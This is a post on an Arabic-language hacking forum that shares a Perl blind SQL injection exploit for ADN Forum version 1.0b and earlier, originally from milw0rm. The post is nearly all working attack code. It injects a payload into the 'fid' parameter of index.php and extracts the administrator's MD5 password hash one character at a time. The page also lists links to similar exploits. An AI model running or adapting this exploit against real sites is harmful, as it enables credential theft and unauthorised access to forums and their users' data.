top left
مـنـتـديـات مـنـظـمـة الاخـتــراق الـعـالـمـيــه
قديم منذ /10-02-2008, 02:15 AM   #1

SubSEven7II
 
الصورة الرمزية SubSEven7II
Supervisor-General

SubSEven7II غير متصل

 رقم العضوية : 102324
 تاريخ التسجيل : Mar 2008
 المشاركات : 2,108
 النقاط : SubSEven7II على طريق الإبداع

Downloads: 0
Uploads: 0
شكراً: 0
تم شكره 9 مرة في 7 مشاركة
افتراضي <= 1.0b Blind SQL Injection Exploit

#!/usr/bin/perl
# --------------------------------------------------
# ADN Forum <= 1.0b Blind SQL Injection Exploit
# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
# Discovered On: 01/10/2008
# Download: SourceForge.net: ADN Forum
# --------------------------------------------------
# Usage: perl exploit.pl cPanel®
# --------------------------------------------------

use strict;
use warnings;
use LWP::UserAgent;
use URI::Escape;

my ($request,$send,$ord,$hash,$uid) = (undef,undef,undef,undef,1);

my $host = shift @ARGV or die "[?] Usage: perl $0 http://[host]\n";
my @chars = (48..57, 97..102);
my $http = new LWP::UserAgent;

for(0..32)
{
foreach $ord(@chars)
{
$send = "' or ascii(substring((select password from adn_usuarios where id=1),$uid,1))=$ord#";
$send = uri_escape($send);

$request = $http->get($host."/index.php?fid=".$send);

if($request->is_success and $request->content =~ /hace clic en el boton de abajo/i)
{
$hash .= chr($ord);
$uid++;
}
}
}

if(defined $hash)
{
print "[+] MD5: $hash\n";
exit;
}
else
{
print "[?] Exploit Failed!\n";
exit;
}

# milw0rm.com [2008-10-01]







::/توقـيـع/:: SubSEven7II

[CENTER][URL=http://up107.arabsh.com/][IMG]http://up107.arabsh.com/s/1i8lrgtjq9.gif[/IMG][/URL][IMG]http://mlfnt.net/up/files/bii0pjgedib0zu2i30k4.gif[/IMG][/CENTER]
  رد مع اقتباس
رد

مواقع النشر (المفضلة)


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
طرق مشاهدة الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are معطلة


المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
MojoClassifieds 2.0 Remote Blind SQL Injection Exploit zeoos :: Local Root Exploit :: 0 07-21-2008 11:00 PM
HRS Multi (picture_pic_bv.asp key) Blind SQL Injection Exploit zeoos :: Local Root Exploit :: 0 07-21-2008 06:30 PM
Triton CMS Pro (X-Forwarded-For) Blind SQL Injection Exploit zeoos :: Local Root Exploit :: 0 07-08-2008 06:30 AM
ODFaq 2.1.0 Blind SQL Injection Exploit zeoos :: Local Root Exploit :: 0 04-27-2008 11:10 PM
PHP-Fusion 6.00.307 Remote Blind SQL Injection Exploit zeoos :: Local Root Exploit :: 1 04-20-2008 01:32 PM


 

الساعة الآن 07:39 AM.
تعريب و ترقية أستايل HoStVb.NeT
Powered by: vBulletin Version 3.8.4
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
مـنـتـديـات مـنـظـمـة الاخـتــراق الـعـالـمـيــه

 

 

 

top right